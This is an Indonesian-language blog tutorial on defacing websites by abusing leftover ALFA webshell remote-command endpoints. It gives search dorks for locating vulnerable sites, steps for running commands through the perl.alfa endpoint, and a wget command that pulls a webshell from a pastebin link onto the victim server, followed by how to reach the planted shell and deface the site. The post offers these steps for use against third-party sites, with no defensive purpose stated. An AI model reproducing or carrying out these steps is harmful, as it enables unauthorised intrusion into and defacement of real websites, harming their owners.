Lompat ke konten Lompat ke sidebar Lompat ke footer

Deface Poc Alfa Perl (RCE) Upload Shell


Hy semua, balik lagi dengan nzul jadi disini aku akan ngasih tutorial cara deface Poc dengan metode RCE perl.alfa.

Jadi ini tuh bekasan upload Shell Alfa yang hilang jadi kita bisa remote nya dengan tools perl Alfa RCE.

Oke langsung lanjut ke tutorial nya

Bahan-bahan yang harus kamu siapkan

Dork?

inurl://ALFA_DATA/alfacgiapi/
intext://perl.alfa
index of /alfacgiapi/per.alfa
Index of /ALFA_DATA/alfacgiapi/perl.alfa

( Racik dork nya atau kalian bisa kembangin sendiri )

ToolsPerl Alfa Rce )
Command upload Shell
wget https://pastebin.com/raw/ept8KywF -O nzul.php

Pertama kalian dorking dulu webnya dengan dork diatas atau dork racikan kalian sendiri.

Ketika sudah Nemu webnya kalian klik per.alfa

Kalo blank berarti webnya vuln Alfa perl RCE.
Selanjutnya kali masuk ke tools nya
Exploits.my.id, dan salin URL tadi 
contoh:

http://site.com/ALFA_DATA/alfacgiapi/perl.alfa
Kemudian cek dengan command ls -la

Kemudian masukkan command upload shellnya
wget https://pastebin.com/raw/ept8KywF -O nzul.php

Lalu klik " Gaskan "


Jika tools nya kayak gini? Berarti Shell kalian telah terUpload ke web tersebut.


Kalo kalian ingin ngecek Shell nya ke upload atau enggak kali bisa masukkan command
ls
Dan akan terlihat Shell kita telah terUpload.


Boom, terUpload kalian tinggal deface deh
Akses?
http://site.com/ALFA_DATA/alfacgiapi/shellmu.php

Mungkin segitu aja tutor dari nzul,
Kalo ada gak paham boleh tanya di kolom komentar

See u next time.

Posting Komentar untuk "Deface Poc Alfa Perl (RCE) Upload Shell"